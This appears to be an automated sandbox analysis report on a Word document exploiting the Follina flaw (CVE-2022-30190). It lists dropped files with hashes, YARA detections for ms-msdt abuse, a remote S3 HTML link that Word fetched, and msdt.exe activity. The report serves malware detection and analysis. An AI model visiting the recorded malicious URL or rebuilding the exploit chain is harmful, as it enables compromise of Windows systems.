                                                                                                                                                                  Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                  Entropy (8bit):1.0893697448949966
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:olgI5lNcYeupcIupMzId5XwPB8EURyajJ2QN/wPxZSu7mN:4veIcIUMcd5AB8uWJ2LZS1
                                                                                                                                                                  MD5:AAA6D6B978FBAFCD5DD76FAC163C7DE5
                                                                                                                                                                  SHA1:82815A1CE8117B7B3EF81BB8E098CFA21DC0A62C
                                                                                                                                                                  SHA-256:7BC2DB1BBCF5FE247881220B96C3F0901535FAE1D23499ADE5F1BC477E676657
                                                                                                                                                                  SHA-512:8131699881585D82A05E86BEEB725C94D31224E8FE01415B6961172013DEE1CD440D18D1FFDB3C4AE11017D2DE6113E9DB875D73F706551CBA84057137EC9A11
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.s.q.d.o.c.s...s.3...e.u.-.w.e.s.t.-.2...a.m.a.z.o.n.a.w.s...c.o.m./.f.b.0.f.9.c.4.5.-.f.b.5.f.-.4.6.9.0.-.9.8.1.5.-.e.1.1.a.7.6.2.d.4.7.3.9...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U....
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:downloaded
                                                                                                                                                                  Size (bytes):6837
                                                                                                                                                                  Entropy (8bit):0.861791117899086
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
                                                                                                                                                                  MD5:BFBFA8FDDA62476690C9077946372EAA
                                                                                                                                                                  SHA1:BBD80340C07F716600B54242F11F25E1BDC442F2
                                                                                                                                                                  SHA-256:A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
                                                                                                                                                                  SHA-512:7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Yara Hits:
                                                                                                                                                                  • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                  • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                  • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Joe Security
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  IE Cache URL:https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html
                                                                                                                                                                  Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5120
                                                                                                                                                                  Entropy (8bit):3.777355438838994
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:6NoPhmKraYZkH8KTibUyPBkwjj0JAC+CFSlwY7c1ul8qa33Rq:bDaAkHHoXk83CuzqqK3
                                                                                                                                                                  MD5:D46EE30C023E865494DAF4F8DAA23AC9
                                                                                                                                                                  SHA1:32C5D39F6F5502DACB4A050F53AA78BDC3C08270
                                                                                                                                                                  SHA-256:1ACD209BF71CE0E08717D03F5111D9963FDA116C442D7B27A069E33064068961
                                                                                                                                                                  SHA-512:8DBBE05E07291D255E1E816ABDC029148C2340B3BFC15B874383FB2852FCFA1854D06EAC03725B0F4E610F6BB914A45C5E508CDE467FC16F99D9BF8723047577
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                  Entropy (8bit):3.092552067793945
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryakQbqak7Ynqq3kQbbPN5Dlq5J:+RI+ycuZhN8qakS3bPNnqX
                                                                                                                                                                  MD5:E6B9565D0F832B29757956C93CA42E67
                                                                                                                                                                  SHA1:AD07907F2CC82DF452B99ACFE613552648049F71
                                                                                                                                                                  SHA-256:F0A5AA628E4DA7A3F471077F5C2698512214056CD99DF12D5B4F228E08742833
                                                                                                                                                                  SHA-512:96DD7C71C4400686A4CCA018AFB2E27463F19184FB1B21F8CA6DEF07B2858D8733FD8842813DDB4CFB8B498C9E216A8A494053CC03D4FFF94F1408B362E994BE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1364
                                                                                                                                                                  Entropy (8bit):4.095885984642426
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:HGC9A+gY8hHChKLc8fII+ycuZhN8qakS3bPNnq9Wd:kf94Kg8g1ul8qa33Rq9m
                                                                                                                                                                  MD5:E0606348DE8B6B789E1FCDA7F979818A
                                                                                                                                                                  SHA1:9616B07A5460BF7B47F86FF0C9F743E53A87EC84
                                                                                                                                                                  SHA-256:89E111C760BE35C2CA359099ED972FA799AB2183EE65F267313028D753A3EFC3
                                                                                                                                                                  SHA-512:921BAA4EAFA4A5C234B7870D5FA5F01F0A3542DDBE7A7ACED366B7E3F8314F7BA408B43EDE86A84994BAC545DC70B223F1543CBFDDE0735EFB595BCA80E18D40
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1364
                                                                                                                                                                  Entropy (8bit):4.092082924283492
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:HkC9A+gbwVhHChKLc8fII+ycuZhNOYakSBNPNnq9Wd:+fbwn4Kg8g1ulta3xq9m
                                                                                                                                                                  MD5:1C12FF4BD83D206E412ACC009814B18F
                                                                                                                                                                  SHA1:6A67AF7484159A1FEBAC932129318B70BCEB9FCE
                                                                                                                                                                  SHA-256:8BFCF5D133EC61257116524AC95D2FCC2AB27134DE166633BC1DCA132CA25A79
                                                                                                                                                                  SHA-512:5E29B0B498CAE374C41EF492C5CBE03119645B97A2E80902016A40D56D80BDC7A92CD2002AC3A92932999E5BE0072B34E95E486C8E97E99A9BBE3CB86D021695
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1364
                                                                                                                                                                  Entropy (8bit):4.104220642349449
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:HVC9A+g44hHlWhhKLc8fII+ycuZhNRakSvPNnq9Wd:RfjYvKg8g1ulRa3tq9m
                                                                                                                                                                  MD5:72FF1A1F1761FA361D8664E02F3ED201
                                                                                                                                                                  SHA1:95AB70F399A8803EDBF4F6FDEB9D3FB63644321D
                                                                                                                                                                  SHA-256:7526A766B4768FBD65FC4D397533F00189414DB7428C8EA5EAC81C58A2A31799
                                                                                                                                                                  SHA-512:A1930463D6DF9592B3382B178F6A244846681D7228384621C9E16FAFC6D8869C192EBB0E76E9AFB4FA4E1C846406EA7696B7E818EE913EA0EA9F6C24CD5073D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                  Entropy (8bit):3.1026997471100266
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAYak7YnqqBNPN5Dlq5J:+RI+ycuZhNOYakSBNPNnqX
                                                                                                                                                                  MD5:A9FCF64D6B37C70DE139F1DBB1640986
                                                                                                                                                                  SHA1:324DC64813DF266D97F72DCBD54A682CF7F7446A
                                                                                                                                                                  SHA-256:2120AE0A67541E384BDA30925EC3756B35F664B395071F77371F803485041293
                                                                                                                                                                  SHA-512:188F2F613A6BEA0E8FCF08C4C6F525478774DF7840D4125C26AFB235FFA7AEB2975993B25DFC52124CF7F775FB2D3E06C1D4FED530402D5046D9C3AEC6DA9069
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.3.4.i.p.5.a.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.3.4.i.p.5.a.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3584
                                                                                                                                                                  Entropy (8bit):3.0894243037017937
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:etGS289pz1qlkCe745Q7GslPor/jvX5ekjV4gztkZfDy6Iv+G3OBWI+ycuZhNOYR:624pqb927GslPYDRjyJDo+k1ulta3xq
                                                                                                                                                                  MD5:E8C0FA4508D78119FF809C4675C6265B
                                                                                                                                                                  SHA1:E8A9831C41F7A75A33CFA84D6EC3A5ED0C7DEF0B
                                                                                                                                                                  SHA-256:4A72E1BB7D525DBF80CF6512BA41318BD099F1375001A57D5BAFB9156DBFD341
                                                                                                                                                                  SHA-512:C784FAFB1F563B05964A18A4E583C6BCB0FCAF54558523A383FC4352DC4DA609F04EB6A0D586B24E584F3D15D2212B0947336F37BC9F64A060F4737835B8168F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):652
                                                                                                                                                                  Entropy (8bit):3.1211826026087652
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNRakSvPNnqX
                                                                                                                                                                  MD5:3E6BBBACD72E4B99FC0F060707336B1A
                                                                                                                                                                  SHA1:85E8943C358F1F11699361C58F6239DF37861D8A
                                                                                                                                                                  SHA-256:FC83CB02D7A38658EAAD87D64EF9BE72BA20DCC7C6E72140CEE540DE4609B34D
                                                                                                                                                                  SHA-512:45E87AAFA08C6BAE978EB9EF2B3B3B525748DDED0EE7F05CABEFE222DFA617889FC3F4040A18F7AA5DF26841418FACB5D249ECF19B252D34E432B911C31DC37C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.2.w.r.4.c.u.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.2.w.r.4.c.u.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                  Entropy (8bit):4.794851800702162
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:lKqedmYoNKvUTCSH3gR8H8FgwSHwBGkwZYPaSJ365OlieMjQZaRRnIjzK:cElNK8TCSfHyPGkwZ+vKOGQZMnD
                                                                                                                                                                  MD5:E32070FDBD00F62C1DF9DDC38949CAAE
                                                                                                                                                                  SHA1:2E7F4609290FD5D0E532DC003ACFB9DC2B67070A
                                                                                                                                                                  SHA-256:FD53F5EB54136D023E720CD72DFAFEFB326C3F1B1851757D7AF4AF8FDE8E2F0B
                                                                                                                                                                  SHA-512:4C14927C745B7CF62D5608C0217B758EEEDA02D8F5F445EFCB76A86282BDFFC2B45D661350BD99F6FF93476F80317F734E233078A39886261BB0A968FDBEE981
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y..b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 20:38:43 2022, mtime=Thu Aug 18 08:02:04 2022, atime=Thu Aug 18 08:01:45 2022, length=11588, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1060
                                                                                                                                                                  Entropy (8bit):4.714770982213462
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:85AMjUbNuElPCH2CE5U0YP28+WE4eF3oiQkcLujEjAJ/20XaDmfkcLMNDTDog5op:85uUwAiQnqUAJO04onoDYgys7aB6m
                                                                                                                                                                  MD5:FFD82FB04D33D8318B4D4455D96165E8
                                                                                                                                                                  SHA1:FC3249B1045B8594310C08F83EF258D38D2679B4
                                                                                                                                                                  SHA-256:F154D97970BAF310B5AACB082EE6D4C1B92FCD4FA3006B0E0ABFE76CE2E9941D
                                                                                                                                                                  SHA-512:1B8CEDE1D57E05E1CADE6F6CCD6385CBEE625A6F12BCCF84E9894FFD46FCC6F18AACAAC62B9DAE41FB3CE7B0DA8F4D201FD1443B37D79D00493B81E9513DDF56
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:L..................F.... ....].......0./......$...D-...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U0H....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......U...user.<.......Ny..U0H.....S....................t...h.a.r.d.z.....~.1......U...Desktop.h.......Ny..U0H.....Y..............>.......@.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.D-...U7H .ICRTA4~1.DOC..P.......U..U7H.....R....................>.#.i.c.R.T.A.4.g.c.S.e...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\icRTA4gcSe.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.c.R.T.A.4.g.c.S.e...d.o.c.x.........:..,.LB.)...As...`.......X.......358075...........!a..%.H.VZAj.................-..!a..%.H.VZAj.................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):82
                                                                                                                                                                  Entropy (8bit):4.727809061035338
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:bDuMJlUGBkRMAAGJFSmxWHgiRMAAGJFSv:bC6GJFKiGJFc
                                                                                                                                                                  MD5:D7F6284D8D590DBA1443A4813889CAB0
                                                                                                                                                                  SHA1:8E0FD4FEF1FDC9DF82D72C05DA1E02DD1A8BA2F3
                                                                                                                                                                  SHA-256:B8D768C3152D7814F59E77E7BD01C64DDFEBF9FD01FE9A869CB286E5C0FD3ECB
                                                                                                                                                                  SHA-512:05A4624E699F5B552FDDDBB43B58D85ABC87C7BA7D9BA51AC0B0E3D9A140E4A6F1958B026E45323A64763A09C77F3025583C7C556A9D0BE11765242018DDED9B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[folders]..Templates.LNK=0..icRTA4gcSe.docx.LNK=0..[misc]..icRTA4gcSe.docx.LNK=0..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                  Entropy (8bit):2.1725311211591296
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Rl/Zd3ztlqKW9kwzlllHlqKSalplB:RtZB6owztIMlB
                                                                                                                                                                  MD5:2B274BA5850BD0A2F120E4E0A71D96D8
                                                                                                                                                                  SHA1:B9E9FD5EDC681D31DF77BAFB2A88313A6A633999
                                                                                                                                                                  SHA-256:8DB9D9FC82380272AC78A93CA0AC8FBAB195618BFA42C2807F049A5074761F3F
                                                                                                                                                                  SHA-512:00B3BF6BCC4E45A8DCDEEEFF9EDA825EA50F2CFAB07F5E3F3E84544A2A9A01E4BCCE5333015F5C300C4E23E3011B134D721797EE5DDEF9447838A53352399590
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h.........?aM.............$.......6C......3a1.............$.......6C......7a5.............$...
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                  Entropy (8bit):2.1725311211591296
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Rl/Zd3ztlqKW9kwzlllHlqKSalplB:RtZB6owztIMlB
                                                                                                                                                                  MD5:2B274BA5850BD0A2F120E4E0A71D96D8
                                                                                                                                                                  SHA1:B9E9FD5EDC681D31DF77BAFB2A88313A6A633999
                                                                                                                                                                  SHA-256:8DB9D9FC82380272AC78A93CA0AC8FBAB195618BFA42C2807F049A5074761F3F
                                                                                                                                                                  SHA-512:00B3BF6BCC4E45A8DCDEEEFF9EDA825EA50F2CFAB07F5E3F3E84544A2A9A01E4BCCE5333015F5C300C4E23E3011B134D721797EE5DDEF9447838A53352399590
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h.........?aM.............$.......6C......3a1.............$.......6C......7a5.............$...
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24702
                                                                                                                                                                  Entropy (8bit):4.37978533849437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                  MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                  SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                  SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                  SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                  Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):66560
                                                                                                                                                                  Entropy (8bit):6.926109943059805
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                  MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                  SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
